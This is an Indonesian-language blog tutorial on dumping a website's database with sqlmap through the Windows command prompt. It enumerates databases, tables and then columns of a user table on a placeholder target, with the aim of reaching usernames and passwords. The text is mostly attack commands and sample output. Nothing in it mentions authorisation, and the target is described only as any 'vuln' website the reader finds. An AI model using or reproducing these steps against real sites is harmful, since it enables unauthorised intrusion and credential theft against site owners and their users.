Ok langsung saja Download dahulu alat perangnya hahah kek apa aja
SQL Map 0.0.9
-Pyhton 2.7
Install pythonnya
extract SQLmapnya(misalkan saya extrack di C:\sqlmap )
Pertama Siapkan website yang vuln
sekarang kita buka cmd (command and prompt)
Klik Start ->All Programs -> Accessories-> Command and prompt
atau WIN-Key + R ketik cmd (Start -> Run ->ketik CMD enter)
sekarang kita menuju direktory dimana tempat folder sqlmap berada
pertama kita ketik perintah cd\ [enter]
maka kita akan drive C
lalu menuju folder sqlmap dengan cara ketik
cd sqlmap [enter]
maka akan ke C:\sqlmap>
Ok kita mulai
ketik perintah yang berwarna merah setelah menuju folder sqlmap berada folder sqlmap saya di drive C:\sqlmap
sqlmap.py -u http://www.targetnmu.co.id/product.php?kat1=3 –dbs
yang berwarna biru diganti web vuln kamu
lihat gambar ini:
setelah di enter maka script sqlmap akan bekerja untuk mencari nama databasenya
Lalu kita lihat isi tablenya dengan mengetik
sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan –tables [enter]
-D = database
–tables=untuk mendapat tables dari db
eh muncul juga table dalam databasenya
+————–+
| green_kat1 |
| green_kat2 |
| green_news |
| green_page |
| green_produk |
| green_user |
+————–+
kita lihat dari table tersebut kira2 user dimana? mungkin di green_user
ayo kita check dengan perintah ini
sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan -T green_users –columns [ENter]
-T = nama table
–columns=melihat columns di table
Lihat itu username dan passwordnya ^ atau yg gambar ini
ns : http://devinclous.wordpress.com
